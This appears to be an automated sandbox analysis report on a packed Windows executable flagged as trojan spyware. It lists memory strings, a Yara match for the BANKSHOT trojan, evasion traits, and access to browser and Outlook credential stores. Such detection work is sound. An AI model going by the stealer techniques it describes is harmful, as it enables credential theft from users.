Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392021959.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2386656748.00000000297CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp, BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2386656748.00000000297CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp, BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2386656748.00000000297CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp, BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2386656748.00000000297CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp, BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://support.mozilla.org
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2386656748.00000000297CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp, BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2386656748.00000000297CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2365609973.000000000147F000.00000004.00000020.00020000.00000000.sdmp, BKFBAECBAEGDGDHIEHIJ.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2205400256.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, GCBGCGHD.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/80x1024
Source: file.exe, 00000000.00000003.2303212760.000000002F859000.00000004.00000020.00020000.00000000.sdmp, FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2303212760.000000002F859000.00000004.00000020.00020000.00000000.sdmp, FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2303212760.000000002F859000.00000004.00000020.00020000.00000000.sdmp, FIJJKECFCFBGDHIECAAFIIDAKK.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: file.exe, 00000000.00000002.2364033932.000000000063A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.file.exe.60bbc8.1.raw.unpack, type: UNPACKEDPE

Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6BB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,

0_2_6C6BB700

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B48CF	0_2_009B48CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009AE019	0_2_009AE019
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B885A	0_2_009B885A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A7686C	0_2_00A7686C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A3E855	0_2_00A3E855
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009A493F	0_2_009A493F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00936166	0_2_00936166
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0086427B	0_2_0086427B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009E4399	0_2_009E4399
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B13B9	0_2_009B13B9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008823BF	0_2_008823BF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B9BF1	0_2_009B9BF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00940CC2	0_2_00940CC2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00969C0B	0_2_00969C0B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B6436	0_2_009B6436
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008CB476	0_2_008CB476
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B2DDF	0_2_009B2DDF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6535A0	0_2_6C6535A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665440	0_2_6C665440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C545C	0_2_6C6C545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C542B	0_2_6C6C542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6CAC00	0_2_6C6CAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695C10	0_2_6C695C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2C10	0_2_6C6A2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D4E0	0_2_6C65D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C696CF0	0_2_6C696CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6664C0	0_2_6C6664C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D4D0	0_2_6C67D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B34A0	0_2_6C6B34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BC4A0	0_2_6C6BC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C666C80	0_2_6C666C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FD00	0_2_6C66FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67ED10	0_2_6C67ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680512	0_2_6C680512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B85F0	0_2_6C6B85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C690DD0	0_2_6C690DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C6E63	0_2_6C6C6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C670	0_2_6C65C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2E4E	0_2_6C6A2E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674640	0_2_6C674640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C679E50	0_2_6C679E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C693E50	0_2_6C693E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B9E30	0_2_6C6B9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A5600	0_2_6C6A5600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697E10	0_2_6C697E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6C76E3	0_2_6C6C76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65BEF0	0_2_6C65BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66FEF0	0_2_6C66FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B4EA0	0_2_6C6B4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BE680	0_2_6C6BE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C675E90	0_2_6C675E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669F00	0_2_6C669F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C697710	0_2_6C697710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65DFE0	0_2_6C65DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686FF0	0_2_6C686FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A77A0	0_2_6C6A77A0

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 005E45C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C68CBE8 appears 58 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6994D0 appears 46 times

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000002.2392510564.000000006C8D5000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2392235915.000000006C6E2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 0.2.file.exe.60bbc8.1.raw.unpack, type: UNPACKEDPE

Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: file.exe

Static PE information: Section: whlvtsns ZLIB complexity 0.9947847098545562

Source: file.exe, 00000000.00000003.2089686437.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2364033932.00000000005E1000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_005F9600

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_005F3720

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\NW8JK5UG.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2204986163.000000001D5F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220232339.000000001D610000.00000004.00000020.00020000.00000000.sdmp, HJDBAFIECGHCBFIDGDAA.0.dr, HJJECBKKECFIEBGCAKJK.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2380999461.000000001D6F6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2391962093.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 52%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1881088 > 1048576

Source: file.exe

Static PE information: Raw size of whlvtsns is bigger than: 0x100000 < 0x1a5200

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2392162329.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2392418682.000000006C88F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2392162329.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.5e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;whlvtsns:EW;upocvnzt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;whlvtsns:EW;upocvnzt:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_005F9860

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1d47fa should be: 0x1d2729

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: whlvtsns
Source: file.exe	Static PE information: section name: upocvnzt
Source: file.exe	Static PE information: section name: .taggant
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
